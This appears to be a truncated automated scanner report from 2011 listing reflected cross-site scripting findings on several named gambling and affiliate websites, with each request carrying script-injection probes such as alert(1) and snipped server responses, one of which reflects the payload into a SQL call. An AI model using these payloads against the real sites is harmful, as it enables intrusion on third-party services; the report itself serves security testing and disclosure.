Confidence: | Certain |
Host: | https://secure.neogames |
Path: | /ScratchCards/Lobby.aspx |
GET /ScratchCards/Lobby.aspx Host: secure.neogames-tech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 19499 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> </title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" /> <meta name="ProgId" ...[SNIP]... UserName='-'; var PlayMode=''; var LastPage='-'; var Gender = ''; var Depositor = ''; var LastDepositStatus = ''; var ErrorCode=''; var Currency='GBPef230';alert(1)/ var Language='ENG'; var iFrameIndex=0; var bRequestedClose = false; //Flag to indicate a close request to prevent double close of the window function ReloadPage(pLanguageCode ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.neogames |
Path: | /ScratchCards/Lobby.aspx |
GET /ScratchCards/Lobby.aspx Host: secure.neogames-tech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 19818 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> </title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" /> <meta name="ProgId" ...[SNIP]... ,'EUR','SPA','17','0','', </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.neogames |
Path: | /ScratchCards/Lobby.aspx |
GET /ScratchCards/Lobby.aspx Host: secure.neogames-tech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 19818 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> </title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" /> <meta name="ProgId" ...[SNIP]... #2c62a0','0','EUR','SPA', </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.neogames |
Path: | /ScratchCards/lobby.aspx |
GET /ScratchCards/lobby.aspx Host: secure.neogames-tech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 19556 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> </title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" /> <meta name="ProgId" ...[SNIP]... tedClose = true; //prevent the "close request" when we change the language window.location.replace( } //send player events notification function TimerGetPlayerEvents() { try { if(UserName!='-') { var h ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.neogames |
Path: | /ScratchCards/lobby.aspx |
GET /ScratchCards/lobby.aspx Host: secure.neogames-tech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 19506 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> </title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" /> <meta name="ProgId" ...[SNIP]... <meta content="info.Winnings ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.neogames |
Path: | /ScratchCards/lobby.aspx |
GET /ScratchCards/lobby.aspx Host: secure.neogames-tech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 19445 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> </title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" /> <meta name="ProgId" ...[SNIP]... <script language="javascript"> LoadLobby('21','#2f82b6', </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.neogames |
Path: | /ScratchCards/lobby.aspx |
GET /ScratchCards/lobby.aspx Host: secure.neogames-tech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 19503 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> </title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" /> <meta name="ProgId" ...[SNIP]... <script language="javascript"> LoadLobby('28','#7dda4d', </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.neogames |
Path: | /ScratchCards/lobby.aspx |
GET /ScratchCards/lobby.aspx Host: secure.neogames-tech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 19556 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> </title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" /> <meta name="ProgId" ...[SNIP]... se = true; //prevent the "close request" when we change the language window.location.replace( } //send player events notification function TimerGetPlayerEvents() { try { if(UserName!='-') { var httpRes ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.neogames |
Path: | /ScratchCards/lobby.aspx |
GET /ScratchCards/lobby.aspx Host: secure.neogames-tech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 19505 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> </title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" /> <meta name="ProgId" ...[SNIP]... <script language="javascript"> LoadLobby('28','#7dda4d', </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.neogames |
Path: | /ScratchCards/lobby.aspx |
GET /ScratchCards/lobby.aspx Host: secure.neogames-tech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 19417 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> </title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" /> <meta name="ProgId" ...[SNIP]... <script language="javascript"> LoadLobby('21','#2f82b6', </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://trk.primescra |
Path: | / |
GET /?ac=5157616<script>alert(1)< Host: trk.primescratchcards.com Proxy-Connection: keep-alive Referer: http://www.primescra User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pscref=; plstat=0; ARC=130137 |
HTTP/1.1 500 Internal Server Error Date: Mon, 16 May 2011 11:45:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 507 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQBCDAQB Cache-control: private <html> <head> <link rel="p3pv1" href="/w3c/p3p.xml">< </head> EXEC sp_pixel_insert 5157616<script>alert(1)< <p>Micro ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | / |
GET /?CMI=1ecc07"><script>alert(1)< Host: www.aspireaffiliates.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:59:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <a href="/?CMI=1ecc07\"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | / |
GET /?CMI=15a96c</script><script Host: www.aspireaffiliates.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:59:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... k(function(){ $("#brands_ok_more").show $("#brands_popular").css( }); }); function RedirectToUrl(url){ //alert(url); if (!url.indexOf('?')){url window.location=url; } function goto(gourl){ window.location='/'+gourl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | / |
GET /?CMI=15ef6"><script>alert(1)< Host: www.aspireaffiliates.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:59:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <iframe src="https://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | / |
GET /?d0cc2%22%3E%3Cscript Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:15 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <a href="/?d0cc2%22%3E ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | / |
GET /?d0cc2%22%3E%3Cscript Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:40 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... ular").css("padding-top", }); }); function RedirectToUrl(url){ //alert(url); if (!url.indexOf('?')){url window.location=url; } function goto(gourl){ window.location='/'+gourl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | / |
GET /?d0cc2%22%3E%3Cscript Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:21 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <iframe src="https://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | / |
GET /?fb220</script><script Host: www.aspireaffiliates.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:59:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... .click(function(){ $("#brands_ok_more").show $("#brands_popular").css( }); }); function RedirectToUrl(url){ //alert(url); if (!url.indexOf('?')){url window.location=url; } function goto(gourl){ window.location='/'+gourl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | / |
GET /?d0cc2"><script>alert(1)< Host: www.aspireaffiliates.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:59:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <iframe src="https://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | / |
GET /?a034a"><script>alert(1)< Host: www.aspireaffiliates.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:59:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <a href="/?a034a\"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /WebSite/Affiliates/login |
GET /WebSite/Affiliates/login Host: www.aspireaffiliates.com Connection: keep-alive Referer: https://www.aspireaf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:47:13 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <a href="/?CMI=13a43e\"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /WebSite/Affiliates/login |
GET /WebSite/Affiliates/login Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:51 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... ular").css("padding-top", }); }); function RedirectToUrl(url){ //alert(url); if (!url.indexOf('?')){url window.location=url; } function goto(gourl){ window.location='/'+gourl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /WebSite/Affiliates/login |
GET /WebSite/Affiliates/login Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:33 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <iframe src="https://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /WebSite/Affiliates/login |
GET /WebSite/Affiliates/login Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:28 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <a href="/?d0cc2%22%3E ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /WebSite/Affiliates/login |
GET /WebSite/Affiliates/login Host: www.aspireaffiliates.com Connection: keep-alive Referer: https://www.aspireaf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:29 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <a href="/?d0cc2\\&8e175\"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /marketing-samples/ |
GET /marketing-samples/?d0cc2 Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:22 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <a href="/?d0cc2%22%3E ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /marketing-samples/ |
GET /marketing-samples/?d0cc2 Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:29 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <iframe src="https://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /marketing-samples/ |
GET /marketing-samples/?d0cc2 Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:47 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... ular").css("padding-top", }); }); function RedirectToUrl(url){ //alert(url); if (!url.indexOf('?')){url window.location=url; } function goto(gourl){ window.location='/'+gourl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /marketing-samples/ |
GET /marketing-samples/?d0cc2 Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:53 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <iframe src="https://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /marketing-samples/ |
GET /marketing-samples/?d0cc2 Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:47:11 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... lar").css("padding-top", }); }); function RedirectToUrl(url){ //alert(url); if (!url.indexOf('?')){url window.location=url; } function goto(gourl){ window.location='/'+gourl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /marketing-samples/ |
GET /marketing-samples/?d0cc2 Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.aspireaf Date: Mon, 16 May 2011 12:46:50 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <a href="/?d0cc2%22%3E ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.aspireaf |
Path: | /mobile/ |
GET /mobile/?d0cc2%22%3E Host: www.aspireaffiliates.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.aspireaf |
